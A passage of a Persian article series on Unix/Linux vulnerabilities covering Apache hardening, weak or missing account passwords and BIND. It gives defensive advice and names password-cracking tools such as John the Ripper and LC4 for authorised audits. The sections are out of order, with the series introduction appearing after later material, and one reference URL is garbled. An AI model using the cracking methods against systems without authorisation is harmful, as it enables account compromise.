ساختار دايرکتوری سيستم عامل و  خارج از chroot وجود نخواهد داشت . بدين ترتيب يک لايه تدافعی مناسب در خصوص سوء استفاده های احتمالی ايجاد می گردد. بعنوان نمونه ، ممکن است يک shell فراخوانده شده  و با توجه به اينکه  bin/sky / در chroot قرار ندارد ، می تواند زمينه سوء استفاده احتمالی را فراهم نمايد. لازم است به اين نکته مهم نيز اشاره گردد که Chrooting آپاچی می تواند اثرات جا نبی نامطلوبی را در ارتباط با CGI,PHP ، بانک های اطلاعاتی و ساير ماژول ها و يا ارتباطاتی که محيط سرويس دهنده وب بمنظور سرويس دهی به آنان نيازمند دستيابی به توابع کتابخانه ای خارجی است را بدنبال داشته باشد .روش های متعددی بمنظور chrooting  وجود داشته و می بايست از مستندات نرم افزار مورد نظر ، بعنوان يک منبع اطلاعاتی مناسب در خصوص ارائه راهکارهای مربوطه ، استفاده گردد
• بمنظور مديريت يک سرويس دهنده وب ، لازم است فيدبک های لازم در خصوص فعاليت و کارآئی سرويس دهنده و ساير مسائلی که ممکن است يک سرويس دهنده با آنان برخورد نمايد را اخذ و در ادامه با آناليز آنان تمهِيدات لازم در خصوص مسائل موجود را بکار گرفت . سرويس دهنده آپاچی ، قابليت ها و پتانسيل های انعطاف پذيری را در خصوص logging ارائه می نمايد . بنابراين لازم است عمليات logging با دقت نظر بالا بصورت موثر و موشکافانه انجام تا امکان رديابی هر نوع فعاليت امنيتی غير مجاز و يا رفتار غير منطقی سرويس دهنده ، فراهم گردد .پيشنهاد می گردد که با يک نظم خاص از اطلاعات موجود در فايل های لاگ ، آرشيو تهيه شود . بدين ترتيب ، امکان مديريت فايل های لاگ و بررسی آنان فراهم خواهد شد. بمنظور آشنائی با فرمت های متفاوت لاگ می تواند از منابع زير استفاده نمود :
  - برای Apache 1.3.x از آدرس http://httpd.apache.org/docs/logs.html استفاده شود .
  - برای Apache 2.0.x  از آدرس http://httpd.apache.org/docs-2.0/logs.html استفاده شود .
  در موارد متفاوتی و با توجه به شرايط پيش آمده ممکن است محتوی فايل های لاگ بتنهائی کافی نباشد . وضعيت فوق در موارديکه از  PHP ، CGI و يا ساير تکنولوژی های مبتنی بر اسکريپت استفاده می گردد ، تشديد و می توان بمنظور افزايش توان آناليز يک تهاجم و سوءاستفاده از يک ضعف امنيتی ، اقدام به ثبت لاگ های مربوط به  GET و POST  نمود.لاگ نمودن عمليات مرتبط به GET و POST می تواند از طريق mod_Security صورت پذيرد. ModSecurity يک سيستم تشخيص مزاحمين ( Intruder detection ) یوده و پيشگيری های لازم در خصوص يک برنامه وب را ارائه می نمايد . سيستم فوق بهمراه سرويس دهنده وب مستقر و يک پوشش امنيتی مناسب را در جهت پيشگيری از يک تهاجم در ارتباط با برنامه های وب فراهم می نمايد . ModSecurity   ، از سرويس دهنده آپاچی حمايت می نمايد .
  - http://www.modsecurity.org
  -  http://www.securityfocus.com/infocus/17064.152.44.126 152.44.126
• PHP، CGI،SSI و ساير اسکريپت ها . در اين رابطه موارد زير پيشنهاد می گردد :
  - PHP,CGI,SSI و ساير زبان های اسکريپت را غير فعال نمائيد ( مگر اينکه ضرورتی جدی در رابطه با آنان وجود داشته باشد ).
  - SSI  یا Server Side Includes را  که می تواند زمينه مساعدی بمنظور سوء استفاده از  سرويس دهنده و الزام آن در جهت اجرای کد ناخواسته گردد را غير فعال نمائيد .
  - در صورتيکه ضروری است که  از PHP,CGI,SSI و يا ساير زبان های اسکريپت استفاده گردد ، می بايست  از SuEXEC استفاده شود. suEXEC ، امکان  اجرای اسکريپت ها تحت آپاچی  بهمراه يک User Id در مقابل يک Apache User Id را فراهم می نمايد در حقيقت suEXEC اين امکان را برای کاربران آپاچی فراهم می نمايد  که قادر به اجرای برنامه های SSI و CGI تحت يک User Id متفاوت نسبت به User Id مربوط به فراخوانی سرويس دهنده وب باشند.بدين ترتيب تهديدات امنيـتی کاهش و امکان نوشتن و اجرای برنامه های SSI و CGI اختصاصی نوشته شده توسط مهاجمان ، حذف خواهد شد . استفاده از  suEXEC ،می بايست توام با آگاهی و دانش لازم باشد چراکه در صورت استفاده نادرست و يا عدم پيکربندی مناسب و شناخت نسبت به مديريت setupid Root ،  خود باعث بروز حفره های امنيتی ديگر خواهد شد.. در اين رابطه و بمنظور آشنائی با نحوه عملکرد و استفاده از suEXEC می توان از آدرس های زير استفاده نمود:
  -- برای Apache 1.3.x از آدرس http://httpd.apache.org/docs/suexec.html استفاده شود .
  -- برای Apache 2.0.x  از آدرس   http://httpd.apache.org/docs-2.0/suexec.html استفاده شود. 
  - بررسی لازم در خصوص محتوی دايرکتوری cgi-bin و ساير دايرکتوری های شامل اسکريپت ها انجام و لازم است تمامی اسکريپت های پيش فرض نمونه ، حذف گردند.
  - ايمن سازی PHP . پرداختن به موضوع فوق با توجه به گستردگی مطالب از حوصله اين مقاله خارج بوده و صرفا" به دو نمونه مهم در اينخصوص اشاره می گردد :
  - غير فعال نمودن پارامترهائی که باعث ارائه اطلاعات در HTTP header می گردد .
  - حصول اطمينان از اجرای PHP در حالت safe
  برای دريافت اطلاعات تکميلی دراين خصوص می توان از آدرس  http://www.securityfocus.com/printable/infocus/1706 استفاده نمود .
  -  استفاده از ماژولهای اضافه بمنظوربهبود وضعيت امنيتی. مثلا"ماژول mod_Security می تواند باعث حفاظت در مقابل Cross Site Scripting:  XSS  ،  شود . برای آشنائی و مشاهده اطلاعات تکميلی در اين خصوص می توان  از آدرس  http://www.modsecurity.org استفاده نمود.
  - مميزی و بررسی اسکريپت ها برای نقاط آسيب پذير شامل XSS & SQL Injection نيز حائز اهميت است . در اين رابطه می توان از ابزارهای متعددی استفاده نمود. نرم افزار Nikto ( قابل دسترس در آدرس   http://www.cirt.net/code/nikto.shtml )  يکی از مناسبترين ابزارهای پويش و بررسی CGI  است .

چهارمين نقطه آسيب پذير : account هائی با رمز عبور ضعيف و يا فاقد رمز عبور
استفاده از رمزعبور، روش های تائيد کاربر و کدهای امنيتی در هر گونه تعامل ارتباطی بين کاربران وسيستم های اطلاعاتی ، امری متداول و رايج است . اکثر روش ها ی  تائيد کاربران ، نظير حفاظت فايل و داده ، مستقيما" به رمزهای عبور ارائه شده توسط کاربران ، بستگی خواهد داشت . پس از تائيد کاربران ، امکان دستيابی آنان به منابع مشخص شده فراهم و هر يک از آنان  با توجه به امتيازات و مجوزهای نسبت داده شده ، قادر به استفاده از منابع موجودخواهند بود. در اغلب موارد ، فعاليت کاربرانی که مجاز بودن آنان برای دستيابی به منابع ، تائيد شده است ، لاگ نشده و يا در صورتيکه فعاليت آنان ثبت گردد ، کمتر سوء ظنی به آنان می تواند وجود داشته باشد . ( آنان پس از تائيد وارد ميدانی شده اند که بدون هيچگونه رديابی ، قادر به انجام فعاليت های گسترده ای خواهند بود) . بنابراين ، رمز عبور دارای نقشی حياتی و اساسی در ايجاد اولين سطح دفاع در يک سيستم اطلاعاتی بوده  و از دست رفتن رمز عبور و يا  ضعف آن می تواند سيستم را در معرض تهديدات جدی قرار دهد . مهاجمان پس از دستيابی به رمز عبور کاربران تائيد شده ( استفاده از مکانيزم های متفاوت ) قادر به دستيابی منابع سيستم و حتی تغيير در تنظيمات ساير account های تعريف شده و موجود بر روی سيستم خواهند بود،عملياتی که می تواند پيامدهای بسيار منفی را بدنبال داشته باشد . پس می بايست بپذيريم که وجود يک account ضعيف و يا فاقد رمز عبور می تواند تهديدی جدی در يک سازمان باشد . در اين راستا علاوه بر اينکه می بايست از پتانسيل های ارائه شده توسط سيستم عامل با دقت استفاده نمود ، ضروری است ، تابع يک  سياست امنيتی تدوين شده در رابطه با رمز عبور در سازمان متبوع خود باشيم . تعريف و نگهداری يک account بهمراه رمز عبور مربوطه در سازمان ما تابع چه سياست امنيتی است ؟  مهمترين و متداولترين نقاط آسيب پذير در ارتباط با رمز عبور شامل موارد زير است :

• Account  تعريف شده  دارای رمز عبور ضعيف و يا فاقد رمز عبور است .
• عدم حفاظت مناسب کاربران از رمزهای عبور ،صرفنظر از استحکام رمزهای عبور تعريف شده .
• سيستم عامل و يا ساير نرم افزارهای موجود ، امکان ايجاد account مديريتی ضعيف  و فاقد رمز عبور را فراهم می نمايند .
• الگوريتم های Hashing رمز عبور( رمزنگاری مبتنی بر کليد عمومی بر پايه يک مقدار hash ، استوار بوده و بر اساس يک مقدار ورودی که دراختيار الگوريتم hashing گذاشته می گردد ، ايجاد می گردد. در حقيقت مقدار hash ، فرم خلاصه شده و رمز شده ای  از مقدار اوليه خود است  ) ، شناخته شده بوده و در اغلب موارد مقدار Hashe بدست آمده ، بگونه ای ذخيره می گردد که امکان مشاهده آن توسط سايرين وجود خواهد داشت. مناسبترين نوع حفاظت در اين راستا ، تبعيت از يک سياست رمز عبور قدرتمند بوده  که در آن دستورالعمل ها ی لازم برای تعريف يک رمز عبورمناسب مشخص و در ادامه با استفاده از ابزارهای موجود، بررسی لازم در خصوص  استحکام و بی نقص بودن رمز عبور صورت گيرد.

سيستم ها ی در معرض آسيب پذير 
هر سيستم عامل و يا برنامه ای که فرآيند تائيد کاربران آن براساس يک User ID و رمز عبور باشد ، در معرض اين تهديد خواهد بود.

نحوه تشخيص آسيب پذيری سيستم
در صورتيکه از account هائی استفاده می شود که بين کاربران متعدد و يا کارکنان موقت  يک سازمان به اشتراک  گذاشته شده و يا کاربران از رمزهای عبور بدرستی حفاظت ننمايند، پتانسيل نفوذ به شبکه توسط يک مهاجم فراهم می گردد.پيکربندی account های جديد کاربران با يک رمز عبور مشابه و يا رمز عبوری که بسادگی قابل حدس باشد نيز  فرصتی مناسب را در اختيار مهاجمان بمنظور دستيابی به منابع اطلاعاتی  موجود در يک سازمان قرار خواهد داد .
لازم است در خصوص ذخيره سازی رمز عبور hashes تصميم گيری و مشخص شود که محل استقرار و ذخيره سازی آنان در etc/passwd /  و يا etc/shadow / می باشد.قابليت خواندن فايل etc/passwd /، می بايست توسط تمامی کاربران شبکه وجود داشته تا زمينه و امکان تائيد کاربران فراهم گردد. در صورتيکه فايل فوق ، شامل رمزعبور hashed نيز باشد ،  در ادامه و پس از دستيابی کاربران به سيستم ، امکان خواندن مقادير hash فراهم و مهاجمان می توانند با استفاده از يک برنامه cracker ، تلاش خود را جهت شکستن و تشخيص رمز عبور آغاز و به سرانجام برسانند . فايل etc/shadow/  ، صرفا" برای root قابل خواندن بوده و مکانی مناسب بمنظور ذخيره نمودن مقادير hashes است . در صورتيکه account های محلی ، توسط /etc/shadow حفاظت نشود ، ريسک رمزهای عبور افزايش خواهد يافت . اکثر سيستم های عامل جديد بصورت پيش فرض از  etc/shadow / بمنظور ذخيره سازی رمز عبور hashes استفاده می نمايند ( مگر اينکه شرايط فوق توسط نصب کننده تغيير يابد ). در اين رابطه می توان از الگوريتم MD5 بمنظور hash نمودن رمزهای عبور نيز استفاده نمود. الگوريتم فوق،  بمراتب از الگوريتم قديمی crypt ايمن تر است .
NIS)Network Information System) ، يک بانک اطلاعاتی توزيع شده بمنظور مديريت يک شبکه است . در حقيقت  NIS ، استانداردی برای اشتراک فايل ها بين سيستم های کامپيوتری متعدد را فراهم و شامل مجموعه ای از سرويس هائی است که بمنزله يک بانک اطلاعاتی از سرويس ها عمل نموده و اطلاعات مربوط به مکان سرويس ( Mapping ) را در اختيار ساير سرويس های شبکه نظير( Network File System (NFS) ، قرار می دهد. با توجه به ماهيت طراحی بعمل آمده  ، فايل های پيکربندی NIS ، شامل رمزهای عبور hash  بوده و اين امر می تواند امکان خواندن آنان را برای تمامی کاربران فراهم و عملا" رمزهای عبور در معرض تهديد قرار گيرند .نسخه های جديد پياده سازی شده  از NIS ، نظير +NIS و يا LDAP عموما" دارای استحکام لازم در ارتباط با رمزهای عبور hashes می باشند( مگر اينکه شرايط فوق توسط نصب کننده تغيير يابد). تنظيم و پيکربندی نسخه های فوق ( نسخه های جديد ) ، مشکل تر بوده و همين امر می تواند استفاده از آنان را با ترديد و مشکل مواجه نمايد . 
حتی اگر رمزهای عبور hashes توسط /etc/shadow و يا امکانات پياده سازی شده ، محافظت گردند ، امکان حدس و تشخيص رمزهای عبور توسط ساير افراد وجود خواهد داشت . در اين رابطه می توان به موارد متعدد ديگری نظير : ضعف رمز عبور ، وجود account های غير استفاده مربوط به کارکنانی که سازمان خود را ترک نموده اند ، اشاره نمود .سازمان ها معمولا" در رابطه با غير فعال نمودن account مربوط به کاربران قديمی کوتاهی نموده و لازم است در اين رابطه از روش های خاصی استفاده گرد.
نصب های پيش فرض سيستم های عامل و يا شبکه توسط سازندگان و يا مديران  سيستم و يا شبکه ، می تواند نصب مجموعه ای از سرويس های غيرضروری را  نيز بدنبال داشته باشد.  رويکرد فوق،با اينکه عمليات نصب سيستم عامل و سرويس ها ی مربوطه را تسهيل می نمايد ولی  مجموعه ای از سرويس های غير ضروری و account هائی که بصورت پيش فرض ضعيف ويا فاقد رمز عبور می باشند را بهمراه بر روی سيستم مستقر و پيکربندی می نمايد.

نحوه حفاظت در مقابل نقطه آسيب پذير
بهترين و مناسبترين دفاع در مقابل ضعف رمزهای عبور ، تبعيت از يک سياست امنيتی مستحکم بوده که دستورالعمل های لازم  کهه موجب می شود رمزهای عبور مناسب و مستحکمی توسط کاربران تعريف و توسط مديران سيستم بصورت مستمر پيوستگی و استحکام آنان بررسی می گردد با حمايت کامل سازمان . مراحل زير توصيه های لازم برای ارائه يک سياست امنيتی مناسب می باشد :

• اطمينان ازاستحکام و انسجام  رمز های عبور . با استفاده از سخت افزار مناسب و اختصاص زمان کافی ، می توان هر رمز عبوری را  crack نمود. در اين راستا می  توان با استفاده ازروش های ساده و در عين حال موفقيت آميز، عمليات تشخيص رمز عبور را انجام داد . اغلب برنامه های تشخيص دهنده رمزعبوراز روشی موسوم به "حملات مبتنی بر سبک ديکشنری " ، استفاده می نمايند. با توجه به اينکه روش های رمز نگاری تا حدود زيادی شناخته شده می باشند  ، برنامه های  فوق ، قادر به مقايسه  شکل  رمز شده يک رمز عبور در مقابل شکل  های رمز شده کلمات ديکشنری می باشند( در زبان های متعدد و استفاده از اسامی مناسب بهمراه جايگشت های مختلف آنان  ) . بنابراين ، رمز عبوری  که ريشه آن در نهايت يک کلمه شناخته شده باشد ، دارای استعداد ذاتی در رابطه با اين نوع از حملات خواهد بود . تعداد زيادی از سازمان ها ، آموزش های لازم در خصوص نحوه تعريف رمزهای عبور را به کارکنان خود داده و به آنان گفته شده است  که رمزهای عبور مشتمل بر ترکيبی از حروف الفبائی و کاراکترهای ويژه را برای خود تعريف نمايند.متاسفانه اکثر کاربران اين موضوع را رعايت ننموده و  بمنظور تعريف يک رمز عبور با نام "password" ، صرفا" اقدام به تبديل حروف به اعداد و يا حروف ويژه می نمايند ( pa$$w0rd) . چنين جايگشت هائی نيز قادر به  مقاومت در مقابل يک تهاجم مبتنی بر ديکشنری نبوده و  "pa$$w0rd" به روش مشابهی که "password" تشخیص داده می شود ، crack خواهد شد .
  يک رمز عبور خوب ، نمی بايست از ريشه يک  کلمه و يا نام شناخته شده ای  اقتباس شده باشد .در اين راستا لازم است به کاربران آموزش لازم در خصوص انتخاب و ايجاد رمزهای عبور از موارد تصادفی نظير  يک عبارت ، عنوان يک کتاب ،نام يک آواز و يا نام يک فيلم  داده شود. با انتخاب  يک رشته طولانی که بر اساس رويکردهای خاصی می تواند انتخاب گردد( گرفتن اولين حرف هر کلمه ، جايگزينی يک کاراکتر خاص برای يک کلمه ، حذف تمامی حروف صدادارو  ساير موارد ) ، کاربران قادر به ايجاد رمزهای عبور مشتمل بر ترکيبی از حروف الفبائی و حروف ويژه بوده که در صورت مواجه شدن  با حملات مبتنی بر ديکشنری ، تشخيص آنان بسختی انجام می شود. لازم است به اين نکته نيز اشاره گردد که رمزعبور می بايست براحتی بخاطر سپرده شده و بازيابی ( يادآوری)آن مشکل نباشد ( هدف از ذخيره سازی ، بازيابی است اگر چيزی را ذخيره  نمائيم ولی در زمان مورد نظر قادر به بازيابی آن نباشيم ، سيستم ذخيره و بازيابی ما با اشکال مواجه شده است ! ). پس از تدوين دستورالعمل لازم بمنظور توليد رمزهای عبور مناسب و  آموزش کاربران بمنظور پايبندی به  اصول امنيتی تعريف شده ، می بايست از روتين ها ی جانبی متعددی بمنظور اطمينان از پيروی کاربران از دستوراالعمل های اعلام شده ، استفاده گردد. بهترين گزينه در اين راستا ، بررسی صحت رمزهای عبور پس از اعمال تغييرات توسط کاربران است .
  پس از ارائه دستورالعمل ها ی لازم و مناسب برای ايجاد رمزهای عبور ، روتين های تکميلی خاصی  می بايست ايجاد تا اين اطمينان حاصل گردد که کاربران پايبند به دستورالعمل های ارائه شده بوده اند. بهترين روش در اين زمينه ، بررسی صحت اعتبار رمزهای عبور پس  از اعمال تغييرات توسط کاربران است . اکثر نمونه های يونيکس و لينوکس می توانند از Npasswd بمنظور بررسی رمز عبور در مقابل سياست امنيتی موجود استفاده نمايند. سيستم های PAM-Enabled  نيز می توانند از Cracklib ( کتابخانه لازم بمنظور هماهنگی با  Crack ) بمنظور بررسی رمزهای عبور ايجاد شده ، استفاده نمايند.اکثر سيستم های PAM-enabled را می توان بگونه ای پيکربندی نمود که رمزهای عبوری  را که با سياست های مشخص شده مطابقت ندارد ، رد نمايند .
  درموارديکه امکان استفاده از ابزارهائی نظير Npasswd و يا کتابخانه های PAM-Enabled ، وجود ندارد، مديران سيستم و شبکه می توانند از برنامه های کاربردی Cracking  در حالت stand-alone و بعنوان يک روتين کنشگرايانه مستمر، استفاده نمايند. LC4 )l0phtcrack version 4) و John the Ripper ، نمونه هائی از برنامه های فوق ، می باشند.  لازم است مجددا" به اين موضوع اشاره گردد که بدون کسب مجوز لازم از مديران ارشد سيستم در سازمان ، نمی بايست از برنامه های cracking استفاده گردد.پس از کسب مجوزهای  لازم ، می توان عمليات فبررسی رمزهای عبور  را بر روی يک ماشين حفاظت شده انجام داد. به کاربرانی که رمزهای عبور آنان crack می گردد، بصورت محرمانه وضعيت فوق گزارش و دستورالعمل های لازم در خصوص نحوه انتخاب يک رمز عبور مناسب نيز به آنان ارائه گردد .اخيرا" و در پاسخ به رمزهای عبور ضعيف ، استفاده از روش هائی ديگر بمنظور تائيد کاربران،  نظير بيومتريک (زيست سنجی )  ، نيز مورد توجه  واقع شده است .
• حفاظت رمزهای عبور مستحکم . در صورتيکه رمزهای عبور hashes در etc/passwd /  ذخيره می گردند ، سيستم را بهنگام نموده تا از  /etc/shadow استفاده گردد . در صورتيکه بر روی  سيتستم  NIS و يا LDAP اجراء که امکان حفاظت hashes وجود نداشته باشد ، هر کاربری قادر به خواندن رمزهای عبور hashes و تلاش بمنظور cracking  آنان ، خواهد بود.در اين رابطه  می بايست بررسی لازم در خصوص استفاده از گزينه های ايمن تری از نسخه های NIS و LDAP را انجام داد. تا زمانيکه اين نوع برنامه های غير ايمن وجود داشته و با نمونه های ايمن جايگزين نشده اند، می بايست  مجوزهای مربوطه را ايمن و از ابزارهای کنشکرايانه بصورت مستمر استفاده گردد.در اين رابطه پيشنهاد می گردد که در مقابل استفاده از الگوريتم قديمی Crypt بمنظورhash نمودن رمزهای عبور از الگوريتم  MD5 استفاده گردد.
  حتی اگر رمزهای عبور ، مستحکم و قدرتمند باشند ، در صورت عدم حفاظت آنان توسط کاربران ، سيستم های موجود در يک سازمان در معرض تهديد قرار خواهند گرفت .  يک سياست امنيتی مناسب ، می بايست شامل دستورالعمل های لازم بمنظور آموزش کاربران در رابطه با حفاظت رمزهای عبور می باشد.عدم ارائه رمز عبور به افراد ديگر، عدم نوشتن رمز عبور در محلی که امکان خواندن آن برای ديگران وجود داشته باشد و حفاظت اتوماتيک فايل  هائی که رمزهای عبور در آن ذخيره شده اند ، از جمله مواردی می باشند که می بايست به کاربران آموزش داده شود. اغلب کاربران در مواجهه با پيامی مشابه "Your password has expired"  که نشاندهنده اتمام عمر مفيد يک رمز عبور است ، يک رمز عبور ضعيف را برای خود انتخاب می نمايند ، بنابراين لازم است در فرصت مناسب و قبل از برخورد با اينچنين پيام هائی ، به کاربران آموزش های لازم ارائه گردد.
• کنترل دائم و پيوسته accounts . هر account مديريتی و يا مبتنی بر سرويس که از آن استفاده نمی گردد، می بايست غير فعال و يا در صورت امکان از روی سيستم حذف گردد. هر account مديريتی و يا مبتنی بر سرويس که از آن استفاده می گردد ، می بايست دارای رمزعبورجديد و مستحکمی باشد. پيکربندی account های جديد کاربران  با رمزهای عبور اوليه (توليده شده بصورت تصادفی)  و ضرورت تغيير رمزهای عبور توسط کاربران و در اولين log in  نيز می تواند در اين زمينه مفيد واقع شود. ممیزی account ها بر روی سيستم را انجام  و لازم است در اين رابطه يک ليستی اصلی ايجاد گردد .در اين رابطه می بايست رمزهای عبور در ارتباط با سيستم هائی نظير روترها ، چاپگرهای ديجيتالی متصل شده به اينترنت و ساير موارد ديگر نيز مورد بررسی قرار گرفته و روتين هائی خاص بمنظور افزودن account های تائيد شده  به ليست و يا حذف  account هائی که ضرورتی به استفاده از آنان نمی باشد ، پياده سازی و همواره خود را پايبند به آن بدانيم .اعتبار ليست را در فواصل زمانی خاصی بررسی تا از بهنگام بودن آن اطمينان حاصل گردد.از روتين های  خاصی بمنظورحذف account متعلق به کارکنان و يا پيمانکارانی که سازمان را ترک نموده اند ، استفاده گردد .

در بخش سوم اين مقاله به بررسی ساير نقاط آسيب پذير يونيکس و لينوکس خواهيم پرداخت .

سيستم عامل، يکی از عناصر چهار گانه در يک سيستم کامپيوتری است که دارای نقشی بسيار مهم و حياتی در نحوه مديريت منابع سخت افزاری و نرم افزاری است . پرداختن به مقوله  امنيت سيستم های عامل ، همواره از بحث های مهم در رابطه با ايمن سازی اطلاعات در يک سيستم کامپيوتری بوده که امروزه با گسترش اينترنت ، اهميت آن مضاعف شده است . بررسی و آناليز امنيت در سيستم های عامل می بايست با ظرافت و در چارچوبی کاملا" علمی و با در نظر گرفتن تمامی واقعيت های موجود ، انجام تا از يک طرف تصميم گيرندگان مسائل استراتژيک در يک سازمان قادر به انتخاب مستند و منطقی يک سيستم عامل باشند و از طرف ديگر امکان نگهداری و پشتيبانی آن با در نظر گرفتن مجموعه تهديدات موجود و آتی  ، بسرعت و بسادگی ميسر گردد .
اکثر کرم ها و ساير حملات موفقيت آميز در اينترنت ، بدليل وجود نقاط آسيب پذير در تعدادی  اندک  از سرويس های سيستم  های عامل متداول است . مهاجمان ، با فرصت طلبی خاص خود از روش  های متعددی بمنظور سوء استفاده از نقاط ضعف امنيتی شناخته شده ، استفاده نموده  و در اين راستا ابزارهای  متنوع ، موثر و گسترده ای را بمنظور نيل به اهداف خود ، بخدمت می گيرند . مهاجمان ، در اين رهگذر متمرکز بر سازمان ها و موسساتی می گردند که هنوز مسائل موجود امنيتی ( حفره ها و نقاط آسيب پذير ) خود را برطرف نکرده و بدون هيچگونه تبعيضی آنان را بعنوان هدف ، انتخاب می نمايند . مهاجمان بسادگی و بصورت مخرب ،  کرم هائی نظير : بلستر ، اسلامر و Code Red را در شبکه  منتشر می نمايند. آگاهی از مهمترين نقاط آسيب پذير در سيستم های  عامل ، امری ضروری است . با شناسائی و آناليز اينگونه نقاط آسيب پذير توسط کارشناسان امنيت اطلاعات ، سازمان ها و موسسات قادر به استفاده از مستندات علمی تدوين شده بمنظور برخورد منطقی با مشکلات موجود و ايجاد يک لايه حفاظتی مناسب می باشند.
در مجموعه مقالاتی که ارائه خواهد شد ، به بررسی مهمترين نقاط آسيب پذير يونيکس و لينوکس خواهيم پرداخت . در اين راستا ، پس از معرفی هر يک از نقاط آسيب پذير ، علت وجود ضعف امنيتی ، سيستم های عامل در معرض تهديد ، روش های  تشخيص آسيب پذيری سيستم و نحوه مقابله و يا پيشگيری در مقابل هر يک از نقاط آسيب پذير ، بررسی می گردد .همزمان با  ارائه مجموعه مقالات مرتبط با  يونيکس ( پنج مقاله ) ، به بررسی مهمترين نقاط آسيب پذير در ويندوز  ، طی مقالات جداگانه ای خواهيم پرداخت .
همانگونه که اشاره گرديد ، اغلب تهديدات و حملات ، متاثر از وجود نقاط آسيب پذير در سيستم های عامل بوده که زمينه تهاجم را برای مهاجمان فراهم می آورد .  شناسائی و آناليز نقاط آسيب پذير در هر يک از سيستم های عامل ، ماحصل  تلاش و پردازش دهها کارشناس امنيتی ورزيده در سطح جهان است و می بايست مديران سيستم و شبکه در يک سازمان بسرعت با آنان آشنا و اقدامات لازم را انجام دهند.
نقاط آسيب پذير موجود در هر سيستم عامل  که در ادامه به آنان اشاره می گردد ، سندی پويا و شامل دستورالعمل های لازم بمنظور برخورد مناسب با هر يک از نقاط آسيب پذير و لينک هائی به ساير اطلاعات مفيد و تکميلی مرتبط با ضعف امنيتی است .

مهمترين نقاط آسيب پذير يونيکس:
يونيکس ، يکی از سيستم های عامل رايج در جهان بوده که امروزه در سطح بسيار وسيعی استفاده می گردد . تا کنون حملات متعددی توسط مهاجمين متوجه سيستم هائی بوده است که از يونيکس ( نسخه های متفاوت )  بعنوان سيستم عامل استفاده می نمايند . با توجه به حملات متنوع و گسترده انجام شده ، می توان مهمترين نقاط آسيب پذير يونيکس را به ده گروه عمده تقسيم نمود :

• BIND Domain Name System
• Remote Procedure Calls (RPC)
• Apache Web Server
• General UNIX Authentication Accounts with No Passwords or Weak Passwords
• Clear Text Services
• Sendmail
• Simple Network Management Protocol (SNMP)
• Secure Shell (SSH)
• Misconfiguration of Enterprise Services NIS/NFS
• Open Secure Sockets Layer (SSL)

در بخش اول اين مقاله ، به بررسی BIND Domain Name System  وRemote Procedure Calls   (موارد يک و دو)  ، خواهيم پرداخت .

اولين نقطه آسيب پذير : BIND Domain Name System
نرم افزار BIND ) Berkeley Internet Name Domain) ، در مقياس گسترده ای و بمنظور پياده سازی DNS)Domain Name Service) ، استفاده می گردد. BIND ، سيستمی حياتی است که از آن بمنظور تبديل اسامی ميزبان ( نظير : www.srco.ir ) به آدرس IP ريجستر شده ،استفاده می گردد .با توجه به استفاده وسيع از BIND  و جايگاه حياتی آن در يک شبکه کامپيوتری ، مهاجمان آن را بعنوان يک هدف مناسب بمنظور انجام حملات ، خصوصا"  از نوع DoS)Denila Of  Service) انتخاب و حملات متنوعی را در ارتباط با آن انجام داده اند. حملات فوق،از کارافتادن سرويس DNS و عدم دستيابی به اينترنت برای سرويس های مربوطه و ميزبانان را می تواند بدنبال داشته باشد. با اينکه پياده کنندگان BIND ، تلاشی مستمر را از گذشته تا کنون بمنظور برطرف نمودن نقاط آسيب پذير انجام داده اند ، ولی هنوز تعداد زيادی از نقاط آسيب پذير قديمی ، بدرستی پيکربندی نشده و سرويس دهندگان آسيب پذير در آن باقی مانده است .
عوامل متعددی در بروز اينگونه حملات نقش دارد: عدم آگاهی لازم مديران سيستم در خصوص ارتقاء امنيتی سيستم هائی که بر روی آنان Bind deamon  بصورت غير ضروری  اجراء می گردد و پيکربندی نامناسب فايل ها ، نمونه هائی از عوامل فوق بوده و  می تواند زمينه  يک تهاجم از نوع DoS  ، يک Buffer Overflow و يا  بروز اشکال در DNS Cache  را بدنبال داشته باشد.از جمله موارديکه اخيرا" در رابطه با ضعف امنيتی  BIND کشف شده است مربوط به يک تهاجم از نوع DoS است . مقاله CERT Advisory CA-2002-15 جزئيات بيشتری را در اين رابطه ارائه می نمايد. از ديگر حملات اخير ، تهاجمی  از نوع Buffer Overflow است . مقاله CERT Advisory CA-2002-19 جزئيات بيشتری را در اين رابطه در اختيار قرار می دهد. درتهاجم فوق ، يک مهاجم از نسخه آسيب پذير پياده سازی  توابع Resolver مربوط به DNS  استفاده و با ارسال پاسخ های مخرب به DNS و اجرای کد دلخواه ، امکان  سوء استفاده از نقطه آسيب پذير فوق را فراهم و حتی دربرخی موارد می تواند زمينه بروز يک تهاجم از نوع  DoS را باعث گردد .
تهديدی ديگر که می تواند در اين رابطه وجود داشته باشد ، حضور يک سرويس دهنده BIND آسيب پذير در شبکه است . در چنين مواردی ، مهاجمان از وضعيت فوق استفاده و از آن بمنزله مکانی جهت استقرار داده های غير معتبر خود و بدون آگاهی مديرسيستم استفاده می نمايند. بدين ترتيب ، مهاجمان از سرويس دهنده بعنوان پلات فرمی بمنظور فعاليت های آتی مخرب خود بهره برداری خواهند کرد .

سيستم های عامل در معرض تهديد :
تقريبا" تمامی سيستم های عامل  يونيکس و لينوکس بهمراه يک نسخه از BIND  ارائه شده اند .در صورت پيکربندی ميزبان بعنوان سرويس دهنده ، نسخه ای  از BIND بر روی آن نصب خواهد شد.

نحوه تشخيص آسيب پذيری سيستم
در صورت دارا بودن  نسخه خاصی از BIND  که بهمراه سيستم عامل ارائه و بر روی سيستم نصب شده است ، می بايست عمليات بهنگام سازی آن را با استفاده از آخرين Patch های ارائه شده توسط توليد کننده ( عرضه کننده ) انجام داد. در صورت استفاده از نسخه BIND مربوط به  ISC: Internet Software Consortium ، می بايست از نصب آخرين نسخه BIND ، اطمينان حاصل نمود . در صورتيکه BIND  نصب شده بر روی سيستم ، نسخه ای قديمی بوده و يا بطور کامل  Patch نشده باشد ، احتمال آسيب پذيری سيستم وجود خواهد داشت . در اکثر سيستم ها ، دستور : "named - v " ، اطلاعات لازم در خصوص نسخه BIND نصب شده بر روی سيستم را بصورت X.Y.Z نمايش خواهد داد . X ، نشاندهنده نسخه اصلی ، Y ،نشاندهنده جزئيات نسخه و Z نشاندهنده يک Patch Level است . پيشنهاد می گردد ، آخرين نسخه BIND  ارائه شده  توسط  ISC  را دريافت و آن را  بر روی سيستم نصب نمود. آخرين نسخه موجود Version 9.2.2 بوده و می توان آن را از سايت  ISC دريافت نمود.  يکی ديگر از رويکردهای کنشگرايانه مرتبط با نگهداری امنيت  BIND ،  عضويت در گروه های خبری نظير Symantec برای آگاهی از آخرين هشدارهای امنيتی است . در اين راستا می توان از يک برنامه پويشگر بهنگام شده  که قادر به 